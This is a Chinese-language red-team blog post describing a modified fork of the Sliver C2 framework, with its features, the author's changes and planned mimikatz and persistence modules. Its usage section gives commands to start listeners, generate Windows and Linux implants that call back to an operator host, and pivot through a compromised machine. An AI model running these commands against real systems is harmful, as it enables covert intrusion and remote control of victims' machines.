长亭百川云 - 文章详情

X-C2使用文档及二开记录(更新中)

RedTeaming

52

2024-07-13

前言


项目魔改自Sliver[1],我觉得这个设计很舒服,优点如下:

•第一个肯定是跨平台•通过GRPC通信•Teamserver模式•支持.net内存加载•支持dll侧加载•支持dll反射加载•多协议上线,可以多选,钓鱼的时候比较好用,http不出网就到dns,http->tls->dns•交互式shell•tcp-pivot和name-pipe,熟悉cs的应该知道这两个协议用于内网机器上线。•支持插件模式•可以自己伪造流量

他的缺点:

•默认协议不支持s5代理,只有wg协议支持socks代理,比较稳定。•windows下的功能没有cs那么强悍,需要通过自己去写插件来补齐能力。•没有GUI。我尝试写过一版,因为使用的是Electron,dns和http2这两个库没法用,作者给了我解决方案,后面把cmd版本完善后再去考虑做跨平台的GUI。•生成文件体积很大,11M左右•自身存在一定特征。•一个C2需要的功能模块满足基本硬需求就好了,最好还是以插件形式添加,不然很臃肿,Go写的东西体积本来就大。•执行命令不是异步的。

我魔改的地方:

•添加socks5模块,(还存在bug,端口转发功能一直没搞定)•机器上线钉钉提醒•去掉没有必要的模块(ps,netstat,ssh等),减小impant体积。•执行cmd命令时自动判断编码,解决原来版本遇到中文报错的情况。•去掉注册表操作模块,感觉没必要,太敏感了,cmd下执行就可以。•截图等其他模块修改保存位置,保存在当前目录下的impantdata目录下,方便查看。•添加域前置-很是离谱,上线一会儿之后就会失去心跳包。•用gotable美化了一下显示页面。

下面想做的

•域前置这个一定要修复•域渗透模块•mimikatz模块•权限维持模块•继续优化体积

使用方法

开启多用户模式-生成新用户

multiplayernew-player -n xwing --lhost 192.168.123.22

导入配置文件client和server可以同时执行操作。

开启监听,支持mtls,wg(WireGuard[2],一个vpn协议,基于udp通信),http(s),dns

 http --lport 1999

生成impant

 generate --http 192.168.123.22:1999 --name impant --os win --skip-symbols

进入第一个截图

内存dump

在这台入口机开启tcp监听 tcp-pivot --lport 9999生成linux的impant

generate --tcp-pivot 192.168.19.16 --os linux --skip-symbols

让linux反连入口机。reconfig --name kali 是重命名当前impant的名字

钉钉提醒

对这个感兴趣的师傅,可以带带我。

References

[1] Sliver: https://github.com/BishopFox/sliver
[2] WireGuard: https://cshihong.github.io/2020/10/11/WireGuard%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86/

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2